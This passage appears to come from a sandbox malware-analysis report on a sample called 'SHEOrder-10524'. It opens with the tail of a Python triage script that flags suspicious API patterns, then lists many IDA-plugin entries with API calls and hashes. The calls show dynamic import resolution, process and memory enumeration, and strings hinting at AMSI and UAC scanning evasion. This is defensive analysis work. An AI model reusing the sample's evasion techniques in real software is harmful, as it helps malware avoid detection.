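            t = _hex(call.args[3]) if len(call.args) > 3 else None
            findings.append(("registry-write",
                             f"{call.name} at {call.ref}, dwType={REG_TYPES.get(t, t)}"))
    if "GetProcAddress" in names and "VirtualProtect" in names:
        findings.append(("resolve-then-reprotect",
                         "GetProcAddress and VirtualProtect in one function (subcalls included)"))
    if "GetProcAddress" in names and any(n.startswith("LoadLibrary") for n in names):
        findings.append(("dynamic-import",
                         "LoadLibrary* + GetProcAddress: static import table understates capability"))
    return findings


def triage_report(text):
    """Map each entry's Opcode ID (or first ref if absent) to its findings."""
    out = {}
    for e in parse_entries(text):
        key = e.fields.get("Opcode ID") or (e.apis[0].ref if e.apis else "?")
        out[key] = triage(e)
    return out


if __name__ == "__main__":
    for key, findings in triage_report(SAMPLE).items():
        print(key[:16], findings)
```

Run it on a whole report saved as text and only the entries that produce findings need a look in the IDA plugin; the Opcode ID is the stable key, since the ref addresses repeat across entries on this page while the opcode hashes differ.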

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                    • Opcode ID: c00d61578a2a6ebfca277a27ec1454f10a2125403d9dd094d1a778e55543bc15
                                                                                                                                                                    • Instruction ID: 733eb0429129f76870dee56a8c3d2514ef70333e4dff5f277838194bcab4224a
                                                                                                                                                                    • Opcode Fuzzy Hash: c00d61578a2a6ebfca277a27ec1454f10a2125403d9dd094d1a778e55543bc15
                                                                                                                                                                    • Instruction Fuzzy Hash: F0F0C22C704214CAC7207B3DD8889AD2B9A6F41319B38942EA44ADB251CB34EC05C763
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 028C4D1F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 028C4D31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                    • Opcode ID: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                                    • Instruction ID: d151d5dc6e0b1b93858a09f95296a7d6ec430693b10f3b77bef2687680d044a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 8281cf0a56594ab61e6c1733d5cfb051ded8f56d9c12036c2c62a925731043c4
                                                                                                                                                                    • Instruction Fuzzy Hash: 82E012FC1052055EFB146F24CC94B3BB36AEFD1745B74449DE808CA168DB38D481AE39
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 028D7396
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 3341692771-2852464175
                                                                                                                                                                    • Opcode ID: e4c209dc4f75cbd0dcca94459899e7db6dbd010a77d105cf0b13d6585d88f0bf
                                                                                                                                                                    • Instruction ID: 0b972addfa10dc80a2b9417a45bced2e620b623544bf7876485463e907beed55
                                                                                                                                                                    • Opcode Fuzzy Hash: e4c209dc4f75cbd0dcca94459899e7db6dbd010a77d105cf0b13d6585d88f0bf
                                                                                                                                                                    • Instruction Fuzzy Hash: A3B1D078A016499FDB14CF98D880A9DFBF2FF89314F648569E909EB364D730A849CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantCopy.OLEAUT32(00000000,00000000), ref: 028CE73D
                                                                                                                                                                      • Part of subcall function 028CE320: VariantClear.OLEAUT32(?), ref: 028CE32F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                    • Opcode ID: c27e225d46cda8f52c0d61343bd3f65be88335379bc429c3fc0b82f45b0a49c2
                                                                                                                                                                    • Instruction ID: 277e7b384ab962bc4240ccddc666e69181027d7ae59d6f2cd664aa287bb8671d
                                                                                                                                                                    • Opcode Fuzzy Hash: c27e225d46cda8f52c0d61343bd3f65be88335379bc429c3fc0b82f45b0a49c2
                                                                                                                                                                    • Instruction Fuzzy Hash: B011E53C70061087D720AF2CC8C096727EAEF85B10B34947EEA4ECB245DB30DC44CAA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                                                    • Opcode ID: 7a58a0064ad42df95ac4d68a899866dc087466586abd5b50f7e45abd46a52e86
                                                                                                                                                                    • Instruction ID: f79cdd021ff17514c2ccf0ab23aeb14753c0977831824821a050e87e6838038c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a58a0064ad42df95ac4d68a899866dc087466586abd5b50f7e45abd46a52e86
                                                                                                                                                                    • Instruction Fuzzy Hash: A331617D904608AFEB10DFACC884AAE77F9EB0C314F648569F909D3240D334E954CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,028D6D75,?,?,?,00000000), ref: 028D6D55
                                                                                                                                                                      • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeFromProgString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4225568880-0
                                                                                                                                                                    • Opcode ID: 2c5c68b3b091c59703d45285617302573cfcd7091912b5afac026fa5563ddeae
                                                                                                                                                                    • Instruction ID: 7b5c6192840e1b63381f204f4c591d1c0f82db7731f9b19d4ae97d1282259694
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5c68b3b091c59703d45285617302573cfcd7091912b5afac026fa5563ddeae
                                                                                                                                                                    • Instruction Fuzzy Hash: D8E0E53C2006187FE700EB7AEC2194977EDDB49710B710475A901D3600EBB9BE0488A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028C584A
                                                                                                                                                                      • Part of subcall function 028C5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028C0000,028EB790), ref: 028C5AAC
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5ACA
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5AE8
                                                                                                                                                                      • Part of subcall function 028C5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028C5B06
                                                                                                                                                                      • Part of subcall function 028C5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028C5B4F
                                                                                                                                                                      • Part of subcall function 028C5A90: RegQueryValueExA.ADVAPI32(?,028C5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001), ref: 028C5B6D
                                                                                                                                                                      • Part of subcall function 028C5A90: RegCloseKey.ADVAPI32(?,028C5B9C,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028C5B8F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                    • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                    • Instruction ID: b684474cf3e10d67184fcf64cf868a4947964ddf57e6d740567d780a6f32cb1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE06D79A002148BCF10DE5C88C0A5733D8AB08754F540965EC68DF346D775E9208BD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028C7DB0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                    • Instruction ID: 216b4fb0a322360df2e071e92cbae30ea2e932e474f64a2c120090e3efd94335
                                                                                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8CD05B7A3091107AD220A55E5C44EB75BDCCBC9771F10063DB668C3180D730CC018671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029245F0,?,028DE40F,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession), ref: 028CC337
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 514040917-0
                                                                                                                                                                    • Opcode ID: 1aeb287b82d92dcec84f61b09f5a20fe5ff591df168de0831e92b6ca4949017a
                                                                                                                                                                    • Instruction ID: c2ad46828e31590d33d6756da2190cd3197532a4c8bccb9841ce99d7a2aa0a90
                                                                                                                                                                    • Opcode Fuzzy Hash: 1aeb287b82d92dcec84f61b09f5a20fe5ff591df168de0831e92b6ca4949017a
                                                                                                                                                                    • Instruction Fuzzy Hash: E1D0A9AAB006242BE200E16C2C818BB328E8B88B20F2000356998CA282FB618E4006D2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                    • Instruction ID: 5834f73c749ad46a5604e9c592e74de721481319f11c082bbde0814e549f0402
                                                                                                                                                                    • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                                                                    • Instruction Fuzzy Hash: 50C08CEE202300065A9461FC0CC44AA438C098413D3340B3DB02CD63E2E331C8566C61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,028E1133,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,ScanString), ref: 028C7E47
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction ID: fdcc5f529ff9fb79787a7c657beceed70db144fa239f4f1f551dd0196f384b99
• Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction Fuzzy Hash: C3C08CFE6023040E5ED062FC1CC06E9428E09849397301B2DF02CE62D2E331D8662C21
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
• Instruction ID: 3113ca4103ff78e9e83302b521b78450581d180c258a5fc224cee3db430a6002
• Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
• Instruction Fuzzy Hash: 7AC012AD60022047FF21965CDCC075562CC9B05295B2400A5E51CD7255E774D8409665
Uniqueness
Uniqueness Score: -1.00%
APIs
• SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
• SysReAllocStringLen.OLEAUT32(028E9E68,028DD42C,00000016), ref: 028C4C7A
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: String$AllocFree
• String ID:
• API String ID: 344208780-0
• Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction ID: e087cc7568d8acbe2bb19650e5cc7ccd180c600b70e9ae6e15d52f28e1260abf
• Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction Fuzzy Hash: E8D080FC5001015EBF3C9519C974936A1AEDAE030F77CCA5D980ECA164EB79D4C0CA35
Uniqueness
Uniqueness Score: -1.00%
APIs
• timeSetEvent.WINMM(00002710,00000000,028E9B48,00000000,00000001), ref: 028E9B64
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: 1e02ddfeee5524c42543f4bb2afd7c5115a6892cde00033e8840c7e2bbe3155b
• Instruction ID: 594dcc321f6d4d2bccf6e016625108bcefd88c4f72904bd64137400e187a0479
• Opcode Fuzzy Hash: 1e02ddfeee5524c42543f4bb2afd7c5115a6892cde00033e8840c7e2bbe3155b
• Instruction Fuzzy Hash: 8EC092F87E53007EFA206AA81CC2FB3659DD745B01F601816B705EE2C1E6F2A8251660
Uniqueness
Uniqueness Score: -1.00%
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 028C4C03
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
• Instruction ID: fe37d7428ef9f2fe97abfd30f95975e6c7ca9ade66e8c8088533b471bb90e9cd
• Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
• Instruction Fuzzy Hash: 6FB0123C20820518FB5411620E50732404C4BA0289FB8005DAF1EC80D5FF31D081983F
Uniqueness
Uniqueness Score: -1.00%
APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028C1A03,?,028C1FC1), ref: 028C15E2
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 1b108d547b7cba193e25307e5e79e4f07d8b585d1e41530e36216c6cfdba8fe5
• Instruction ID: 01b65b8359b87e5cc3cb6af5ea83525b7128e129762dd16dee6d027bd52b60ba
• Opcode Fuzzy Hash: 1b108d547b7cba193e25307e5e79e4f07d8b585d1e41530e36216c6cfdba8fe5
• Instruction Fuzzy Hash: DBF049F8B463004FDB15DF7999843117ADAE7C9345F21857DD60DDB39AE771842A8B00
Uniqueness
Uniqueness Score: -1.00%
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028C1FC1), ref: 028C16A4
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8f0b7949b41564294fc865ac3d312acd5095eeb9a336537b9c367aca8b924f77
• Instruction ID: cefafbd2e9883f60a41640a274c44c6918b8bb9d624fd531e5b30d398a1852e2
• Opcode Fuzzy Hash: 8f0b7949b41564294fc865ac3d312acd5095eeb9a336537b9c367aca8b924f77
• Instruction Fuzzy Hash: 49F090FAB447956BDB209E5A9CC4B92BBA8FB00314F150179E90CD7345D774E8148B98
Uniqueness
Uniqueness Score: -1.00%
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028C1FE4), ref: 028C1704
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c0eb346862149d14908fa26484b01688dc3c7627efb2434cca4194003cdbe3f7
• Instruction ID: 41bb902969d66d5d5c62278d381488426f86cc2bdfa448df10466879734ccd90
• Opcode Fuzzy Hash: c0eb346862149d14908fa26484b01688dc3c7627efb2434cca4194003cdbe3f7
• Instruction Fuzzy Hash: 1AE04F7D3003016FD7105A7D5DC8B12BAD8AB44654F344479F509DB246D370E8148B64
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028D9E1B,?,?,028D9EAD,00000000,028D9F89), ref: 028D9BA8
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028D9BC0
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028D9BD2
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028D9BE4
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028D9BF6
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028D9C08
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028D9C1A
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 028D9C2C
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028D9C3E
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028D9C50
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028D9C62
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028D9C74
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028D9C86
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 028D9C98
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028D9CAA
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028D9CBC
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028D9CCE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                    • API String ID: 667068680-597814768
